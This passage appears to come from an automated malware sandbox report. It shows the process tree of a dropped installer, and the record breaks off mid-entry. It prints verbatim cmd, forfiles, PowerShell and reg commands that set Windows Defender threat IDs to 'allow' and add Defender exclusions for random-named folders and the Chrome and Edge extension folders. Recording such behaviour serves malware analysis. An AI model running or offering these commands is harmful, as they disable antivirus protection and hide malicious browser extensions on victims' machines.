                                                        • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
                                                          C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce-installer_7.14.2_vbox-6.1.20.exe
                                                          4⤵
                                                          • Executes dropped EXE
                                                          PID:6076
                                                          • C:\Windows\SYSTEM32\msiexec.exe
                                                            "msiexec.exe" /qn /i VirtualBox-6.1.20-r143896.msi ADDLOCAL=VBoxApplication,VBoxPython VBOX_INSTALLDESKTOPSHORTCUT=0 VBOX_INSTALLQUICKLAUNCHSHORTCUT=0 /log "C:\Users\Admin\AppData\Local\Temp\charityengine-install-vbox-log.txt"
                                                            5⤵
                                                              PID:3604
                                                            • C:\Users\Admin\AppData\Local\Temp\IXP000.TMP\ce_7.14.2_windows_x86_64.exe
                                                              "ce_7.14.2_windows_x86_64.exe" /S /v"/qn ACCTMGR_LOGIN=anonymous ACCTMGR_PASSWORDHASH=S16-01 /norestart /log C:\Users\Admin\AppData\Local\Temp\charityengine-install-ce-log.txt"
                                                              5⤵
                                                              • Executes dropped EXE
                                                              PID:5524
                                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe
                                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\msbuild.exe"
                                                        2⤵
                                                          PID:2212
                                                      • C:\Windows\system32\svchost.exe
                                                        C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -p -s fhsvc
                                                        1⤵
                                                          PID:924
                                                        • C:\Windows\system32\svchost.exe
                                                          C:\Windows\system32\svchost.exe -k LocalSystemNetworkRestricted -s WPDBusEnum
                                                          1⤵
                                                            PID:3800
                                                          • C:\Windows\SysWOW64\WerFault.exe
                                                            C:\Windows\SysWOW64\WerFault.exe -pss -s 480 -p 4676 -ip 4676
                                                            1⤵
                                                              PID:2252
                                                            • C:\Users\Admin\AppData\Local\Temp\7zSCBCC.tmp\Install.exe
                                                              C:\Users\Admin\AppData\Local\Temp\7zSCBCC.tmp\Install.exe Wt /poodidzktL 385118 /S
                                                              1⤵
                                                              • Executes dropped EXE
                                                              • Drops desktop.ini file(s)
                                                              • Drops file in System32 directory
                                                              PID:5184
                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                "C:\Windows\System32\cmd.exe" /C forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6" & forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                2⤵
                                                                  PID:1420
                                                                  • C:\Windows\SysWOW64\forfiles.exe
                                                                    forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147735503 /t REG_SZ /d 6"
                                                                    3⤵
                                                                      PID:5516
                                                                      • C:\Windows\SysWOW64\cmd.exe
                                                                        /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                        4⤵
                                                                          PID:4676
                                                                          • \??\c:\windows\SysWOW64\reg.exe
                                                                            reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6
                                                                            5⤵
                                                                              PID:6096
                                                                        • C:\Windows\SysWOW64\forfiles.exe
                                                                          forfiles /p c:\windows\system32 /m calc.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147814524 /t REG_SZ /d 6"
                                                                          3⤵
                                                                            PID:6080
                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                              /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                              4⤵
                                                                                PID:6092
                                                                                • \??\c:\windows\SysWOW64\reg.exe
                                                                                  reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147814524 /t REG_SZ /d 6
                                                                                  5⤵
                                                                                    PID:6100
                                                                              • C:\Windows\SysWOW64\forfiles.exe
                                                                                forfiles /p c:\windows\system32 /m where.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147780199 /t REG_SZ /d 6"
                                                                                3⤵
                                                                                  PID:5196
                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                    /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                    4⤵
                                                                                      PID:5596
                                                                                      • \??\c:\windows\SysWOW64\reg.exe
                                                                                        reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147780199 /t REG_SZ /d 6
                                                                                        5⤵
                                                                                          PID:6036
                                                                                    • C:\Windows\SysWOW64\forfiles.exe
                                                                                      forfiles /p c:\windows\system32 /m waitfor.exe /c "cmd /C reg add \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v 2147812831 /t REG_SZ /d 6"
                                                                                      3⤵
                                                                                        PID:5368
                                                                                        • C:\Windows\SysWOW64\cmd.exe
                                                                                          /C reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                          4⤵
                                                                                            PID:3060
                                                                                            • \??\c:\windows\SysWOW64\reg.exe
                                                                                              reg add "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147812831 /t REG_SZ /d 6
                                                                                              5⤵
                                                                                                PID:5484
                                                                                          • C:\Windows\SysWOW64\forfiles.exe
                                                                                            forfiles /p c:\windows\system32 /m help.exe /c "cmd /C powershell start-process -WindowStyle Hidden gpupdate.exe /force"
                                                                                            3⤵
                                                                                              PID:5504
                                                                                              • C:\Windows\SysWOW64\cmd.exe
                                                                                                /C powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                4⤵
                                                                                                  PID:4012
                                                                                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    powershell start-process -WindowStyle Hidden gpupdate.exe /force
                                                                                                    5⤵
                                                                                                    • Drops file in System32 directory
                                                                                                    • Modifies data under HKEY_USERS
                                                                                                    • Suspicious use of AdjustPrivilegeToken
                                                                                                    PID:5560
                                                                                                    • C:\Windows\SysWOW64\gpupdate.exe
                                                                                                      "C:\Windows\system32\gpupdate.exe" /force
                                                                                                      6⤵
                                                                                                        PID:5928
                                                                                              • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"225451\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"256596\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"242872\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749373\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147807942\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735735\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737010\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737007\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147735503\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147749376\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147737394\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"2147841147\" /t REG_SZ /d 6 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction\" /f /v \"359386\" /t REG_SZ /d 6 /reg:64;"
                                                                                                2⤵
                                                                                                • Drops file in System32 directory
                                                                                                • Modifies data under HKEY_USERS
                                                                                                • Suspicious use of AdjustPrivilegeToken
                                                                                                PID:6064
                                                                                                • C:\Windows\System32\Conhost.exe
                                                                                                  \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                  3⤵
                                                                                                    PID:5596
                                                                                                  • C:\Windows\SysWOW64\cmd.exe
                                                                                                    "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                    3⤵
                                                                                                      PID:5776
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:32
                                                                                                        4⤵
                                                                                                          PID:5756
                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 225451 /t REG_SZ /d 6 /reg:64
                                                                                                        3⤵
                                                                                                          PID:5832
                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:32
                                                                                                          3⤵
                                                                                                            PID:5164
                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 256596 /t REG_SZ /d 6 /reg:64
                                                                                                            3⤵
                                                                                                              PID:5540
                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:32
                                                                                                              3⤵
                                                                                                                PID:3996
                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 242872 /t REG_SZ /d 6 /reg:64
                                                                                                                3⤵
                                                                                                                  PID:5840
                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:32
                                                                                                                  3⤵
                                                                                                                    PID:3648
                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749373 /t REG_SZ /d 6 /reg:64
                                                                                                                    3⤵
                                                                                                                      PID:5812
                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:32
                                                                                                                      3⤵
                                                                                                                        PID:1868
                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147807942 /t REG_SZ /d 6 /reg:64
                                                                                                                        3⤵
                                                                                                                          PID:5948
                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:32
                                                                                                                          3⤵
                                                                                                                            PID:1596
                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735735 /t REG_SZ /d 6 /reg:64
                                                                                                                            3⤵
                                                                                                                              PID:5712
                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:32
                                                                                                                              3⤵
                                                                                                                                PID:5124
                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737010 /t REG_SZ /d 6 /reg:64
                                                                                                                                3⤵
                                                                                                                                  PID:5920
                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:32
                                                                                                                                  3⤵
                                                                                                                                    PID:5656
                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737007 /t REG_SZ /d 6 /reg:64
                                                                                                                                    3⤵
                                                                                                                                      PID:5240
                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:32
                                                                                                                                      3⤵
                                                                                                                                        PID:128
                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737503 /t REG_SZ /d 6 /reg:64
                                                                                                                                        3⤵
                                                                                                                                          PID:3008
                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:32
                                                                                                                                          3⤵
                                                                                                                                            PID:5664
                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147735503 /t REG_SZ /d 6 /reg:64
                                                                                                                                            3⤵
                                                                                                                                              PID:5192
                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
                                                                                                                                              "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:32
                                                                                                                                              3⤵
                                                                                                                                                PID:580
                                                                                                                                              • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147749376 /t REG_SZ /d 6 /reg:64
                                                                                                                                                3⤵
                                                                                                                                                  PID:5692
                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:32
                                                                                                                                                  3⤵
                                                                                                                                                    PID:2060
                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147737394 /t REG_SZ /d 6 /reg:64
                                                                                                                                                    3⤵
                                                                                                                                                      PID:6140
                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:32
                                                                                                                                                      3⤵
                                                                                                                                                        PID:3128
                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 2147841147 /t REG_SZ /d 6 /reg:64
                                                                                                                                                        3⤵
                                                                                                                                                          PID:5436
                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:32
                                                                                                                                                          3⤵
                                                                                                                                                            PID:3040
                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Threats\ThreatIDDefaultAction" /f /v 359386 /t REG_SZ /d 6 /reg:64
                                                                                                                                                            3⤵
                                                                                                                                                              PID:3124
                                                                                                                                                          • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                            powershell "cmd /C REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\ecOJmsgAHWlsC\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\epoBtGYzqLvU2\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\qIYKRzUEasUn\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Program Files (x86)\zgoZGMcaU\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\ProgramData\pICeQFkDCDDquYVB\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Users\Admin\AppData\Local\Temp\rhuXFflbMyLRQZzPf\" /t REG_DWORD /d 0 /reg:64;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:32;REG ADD \"HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths\" /f /v \"C:\Windows\Temp\nlcUipsDcFbdntMB\" /t REG_DWORD /d 0 /reg:64;"
                                                                                                                                                            2⤵
                                                                                                                                                            • Drops file in System32 directory
                                                                                                                                                            • Modifies data under HKEY_USERS
                                                                                                                                                            PID:5516
                                                                                                                                                            • C:\Windows\SysWOW64\cmd.exe
                                                                                                                                                              "C:\Windows\system32\cmd.exe" /C REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                              3⤵
                                                                                                                                                                PID:5816
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  REG ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                  4⤵
                                                                                                                                                                    PID:5736
                                                                                                                                                                • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                  "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\HwnzDfNzNWHpPtLDwZR" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                  3⤵
                                                                                                                                                                    PID:5732
                                                                                                                                                                  • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                    "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                    3⤵
                                                                                                                                                                      PID:6136
                                                                                                                                                                    • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                      "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\ecOJmsgAHWlsC" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                      3⤵
                                                                                                                                                                        PID:5112
                                                                                                                                                                      • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                        "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                        3⤵
                                                                                                                                                                          PID:1500
                                                                                                                                                                        • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                          "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\epoBtGYzqLvU2" /t REG_DWORD /d 0 /reg:64
                                                                                                                                                                          3⤵
                                                                                                                                                                            PID:3264
                                                                                                                                                                          • C:\Windows\SysWOW64\reg.exe
                                                                                                                                                                            "C:\Windows\system32\reg.exe" ADD "HKLM\SOFTWARE\Policies\Microsoft\Windows Defender\Exclusions\Paths" /f /v "C:\Program Files (x86)\qIYKRzUEasUn" /t REG_DWORD /d 0 /reg:32
                                                                                                                                                                            3⤵
                                                                                                                                                                              PID:5856
                                                                                                                                                                            • C:\Windows\SysWOW64\reg.exe
